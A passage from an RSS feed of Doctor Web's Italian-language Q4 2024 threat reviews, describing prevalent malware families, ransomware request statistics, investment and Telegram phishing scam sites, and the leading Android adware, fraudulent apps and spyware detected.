    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4210&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8242&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma malevolo che assicura l'avvio di un trojan cryptominer.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;h2 class="alignCenter"&gt;Statistiche sulle applicazioni malevole nel traffico email&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/02_mail_traffic_q4_2024_en.1.png" alt="Statistiche sulle applicazioni malevole nel traffico email"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;  
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Una famiglia di script malevoli, scritti nel linguaggio JavaScript. Incorporano uno script malevolo nel codice HTML di pagine web.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di una scorciatoia appositamente formata che viene distribuita tramite unità rimovibili e, per fuorviare gli utenti, ha l'icona di un disco. Alla sua apertura, vengono avviati script VBS malevoli da una directory nascosta situata sulla stessa unità della scorciatoia.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Win32.HLLW.Rendoc.3&amp;lng=it"&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Un worm di rete che si diffonde, tra l'altro, anche attraverso dispositivi rimovibili.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Fbng.123&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma trojan spia, anche conosciuto come FormBook. È progettato per il furto di vari dati dai dispositivi infetti. Ruba le password salvate in browser, client email, sistemi di messaggistica online e altri software, intercetta i dati inseriti in moduli web, monitora le premute sulla tastiera (realizza la funzione di keylogger) e cattura screenshot. Inoltre, è in grado di scaricare e avviare altri programmi, nonché eseguire vari comandi dei malintenzionati funzionando come backdoor.&lt;/dd&gt;  
  &lt;/dl&gt;

&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Ransomware di criptazione&lt;/h2&gt;
  &lt;p&gt;Nel IV trimestre 2024, il numero di richieste per la decriptazione di file interessati da trojan ransomware di criptazione è diminuito del 18,96%, rispetto al III trimestre.&lt;/p&gt;
  &lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al servizio di supporto tecnico Doctor Web:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/03_encoder_requests_q4_2024_en.1.png" alt="Ransomware di criptazione"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Ransomware di criptazione più diffusi di IV trimestre:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 22.63% di richieste utente&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder. 35067&lt;/b&gt; — 3.91% di richieste utente&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 3.35% di richieste utente&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07% di richieste utente&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.38200&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.07% di richieste utente&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Truffe online&lt;/h2&gt;
  &lt;p&gt;Nel IV trimestre 2024, continuava a essere attuale lo schema di frode in cui i malintenzionati su siti appositamente creati invitavano le potenziali vittime a guadagnare tramite vari investimenti. Per "accedere" ai servizi di investimento, agli utenti viene chiesto di registrarsi indicando i dati personali i quali poi finiscono nelle mani dei truffatori. Nei simili siti si imbattevano gli abitanti di vari paesi.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/04_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito truffa, presumibilmente legato alla Banca mondiale, che promette agli europei dividendi dall'investimento in settori di economia con buone prospettive&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/05_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Un sito truffa invita gli utenti slovacchi a "guadagnare oltre $192.460 al mese" tramite un certo servizio di investimento&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/06_fraud_q4_2024.1.png" alt="Truffe online"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/07_fraud_q4_2024.1.png" alt="Truffe online"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Truffatori si spacciano per maggiori banche e compagnie petrolifere e del gas e suggeriscono agli utenti da Armenia e Moldavia di "guadagnare con azioni"&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/08_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito di una compagnia petrolifera e del gas azera, dove ai visitatori viene promesso un guadagno di 1.000 manat al mese&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/09_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito di una "nuova piattaforma di investimento da Google" invita a partecipare a un sondaggio e ottenere l'accesso al servizio che presumibilmente consentirebbe di guadagnare a partire da €1.000&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/10_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Uno dei siti truffa promette agli utenti russi un "sicuro reddito passivo" a partire da 150.000 rubli al mese&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Gli specialisti Doctor Web hanno notato anche una variazione stagionale del contenuto dei simili siti. Così, in previsione delle festività di capodanno, i truffatori hanno cominciato a sfruttare più spesso il tema di regali presumibilmente a nome di banche, compagnie petrolifere e del gas, scambi di criptovalute e altre organizzazioni. Ad esempio, su una delle false risorse internet, gli utenti russi presumibilmente potrebbero ricevere bonus monetari da uno scambio di criptovalute pagati in base a certe "liste". E per controllare la disponibilità di tale bonus, loro dovevano completare un sondaggio e fornire i dati personali.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/11_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Falso sito di scambio di criptovalute suggerisce agli utenti russi di ottenere i "bonus di capodanno"&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Un altro falso sito riportava una certa "offerta di capodanno" da una compagnia petrolifera e del gas, nell'ambito della quale molti utenti da Kazakistan in onore del Giorno dell'indipendenza del paese presumibilmente potrebbero cominciare a ricevere da 200.000 a 1.000.000 di tenge al mese. Per "ottenere" i pagamenti, le potenziali vittime dovevano presentare la "domanda" indicando i propri dati personali sul sito.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/12_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Sito truffa promette agli utenti kazaki cospicui pagamenti in onore del Giorno dell'indipendenza nell'ambito "dell'offerta di capodanno"&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Allo stesso tempo, i nostri analisti internet hanno registrato la comparsa di falsi siti di banche russe, dove le potenziali vittime vengono invitate a partecipare a un sondaggio sulla qualità del servizio e presumibilmente ricevere per questo una ricompensa in denaro. A questo scopo, agli utenti vengono chiesti i dati personali, quale il nome, il cognome e il patronimico, il numero di cellulare legato all'account della banca, nonché il numero della carta bancaria.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/13_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Esempio di falso sito di banca, che copia il design del vero sito dell'istituzione creditizia e invita le potenziali vittime a completare un sondaggio per una ricompensa&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/14_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Per "partecipare" al sondaggio, l'utente deve compilare un modulo fornendo i propri dati&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Inoltre, sono stati identificati siti frode che invitano a seguire corsi di formazione online — ad esempio, quello sulla programmazione. Ai visitatori interessati veniva chiesto di lasciare i dati di contatto per "ottenere una consulenza".&lt;/p&gt;


  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/15_fraud_q4_2024.1.png" alt="Truffe online"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/16_fraud_q4_2024.1.png" alt="Truffe online"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Sito che offre corsi di programmazione online. Per "ottenere una consulenza", gli utenti devono indicare i dati personali&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;I truffatori internet non rinunciano ai tentativi di rubare account Telegram. Così, nel IV trimestre 2024, sono stati scoperti ulteriori siti di phishing mascherati da varie votazioni online — ad esempio, in "concorsi di disegno per bambini". Per "confermare" il voto, gli utenti devono indicare un numero di cellulare al quale verrà inviato un codice di verifica. Tuttavia, fornendo questo codice sul falso sito, loro aprono ai truffatori l'accesso ai propri account.&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/17_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito dei truffatori su cui ai visitatori viene suggerito di votare in un concorso di disegno per bambini&lt;/em&gt;&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/18_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Il "sistema di conteggio dei voti" chiede un numero di cellulare per la "conferma del voto" e l'invio di un codice monouso&lt;/em&gt;&lt;/p&gt;


  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_common/19_fraud_q4_2024.1.png" alt="Truffe online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Inserendo il codice ricevuto, le vittime forniscono ai truffatori l'accesso ai propri account Telegram&lt;/em&gt;&lt;/p&gt;

  &lt;div class="CellBlock dangerous_urls_new alignCenter"&gt;
    &lt;a href="https://antifraud.drweb-av.it/dangerous_urls/" target="_blank" rel="noopener noreferrer" class="fontM font2X white textShadow"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;
  &lt;/div&gt;  
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h2&gt;
  &lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel IV trimestre 2024 gli utenti si imbattevano il più frequentemente nei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, nelle applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.Siggen&lt;/b&gt;. Inoltre, nel periodo passato gli specialisti dell'azienda Doctor Web hanno rilevato numerose nuove minacce sullo store di app Google Play.&lt;/p&gt;
  &lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in IV trimestre:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;alta attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e dei programmi malevoli fraudolenti &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;,&lt;/li&gt;
    &lt;li&gt;comparsa di nuove applicazioni malevole sullo store di app Google Play.&lt;/li&gt;
  &lt;/ul&gt;

  &lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel IV trimestre 2024 leggete la nostra &lt;a href="https://news.drweb-av.it/show/review/?i=14950" target="_blank" rel="noopener noreferrer"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;


&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14950&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in IV trimestre 2024</title><link>https://news.drweb-av.it/show/?i=14950&amp;lng=it&amp;c=9</link><pubDate>Thu, 26 Dec 2024 03:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;26 dicembre 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel IV trimestre 2024 i programmi malevoli più diffusi sono stati i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Seguono le applicazioni malevole utilizzate per scopi fraudolenti &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. La top tre è chiusa dai trojan &lt;b&gt;Android.Siggen&lt;/b&gt; aventi varie funzionalità malevole.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Durante il trimestre gli analisti dei virus dell'azienda Doctor Web hanno scoperto un gran numero di minacce sullo store di app Google Play. Tra di esse erano numerosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, nonché i programmi malevoli delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, i quali iscrivevano gli utenti a servizi a pagamento. Sono stati registrati ulteriori trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Inoltre, i malintenzionati distribuivano applicazioni malevole protette da un sofisticato packer.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPALI TENDENZE DI IV TRIMESTRE&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Alta attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e dei programmi fraudolenti &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
      &lt;li&gt;Distribuzione di numerose applicazioni malevole tramite lo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.1.png" alt="Secondo i dati di Dr.Web Security Space per dispositivi mobili"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programmi trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Packed&amp;lng=it"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57083&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni malevole protette dal software packer ApkProtector. Tra di esse possono essere i trojan bancari, gli spyware e altri software malevoli.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojan che viene incorporato in mods dell'applicazione di messaggistica istantanea WhatsApp e si maschera da classi delle librerie di Google. Nel corso dell'utilizzo dell'applicazione vettore, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Click.1751&amp;lng=it"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; effettua richieste a uno dei server di comando e controllo. In risposta, il trojan riceve due link, uno dei quali è destinato agli utenti di lingua russa, e il secondo a tutti gli altri utenti. Quindi visualizza una finestra di dialogo con il contenuto ricevuto dal server, e dopo che l'utente fa clic sul pulsante di conferma, carica il link corrispondente nel browser.&lt;/dd&gt;    
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.1.png" alt="Secondo i dati di Dr.Web Security Space per dispositivi mobili"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito hanno una lista dei sistemi di pagamento e delle banche più popolari attraverso cui presumibilmente sarebbe possibile trasferire i premi. Ma anche quando gli utenti riescono ad accumulare una somma sufficiente per il prelievo, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di programmi adware che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, al modificatore compare la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.TrackView&amp;lng=it"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di un'applicazione che consente di monitorare gli utenti attraverso i dispositivi Android. Utilizzando questo programma, i malintenzionati possono rilevare la posizione dei dispositivi di destinazione, utilizzare la fotocamera per registrare video e scattare foto, effettuare l'ascolto tramite il microfono, creare registrazioni audio ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.SecretVideoRecorder&amp;lng=it"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di varie versioni di un'applicazione per la ripresa di foto e video in background attraverso le fotocamere integrate di dispositivi Android. Questo programma può funzionare impercettibilmente consentendo di disattivare le notifiche di registrazione, nonché cambiare con quelle false l'icona e la descrizione dell'app. Tali funzionalità lo rendono potenzialmente pericoloso.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.1.png" alt="Secondo i dati di Dr.Web Security Space per dispositivi mobili"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. In tali programmi è incorporato un modulo speciale che consente di aggirare il controllo della firma digitale dopo la loro modifica.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
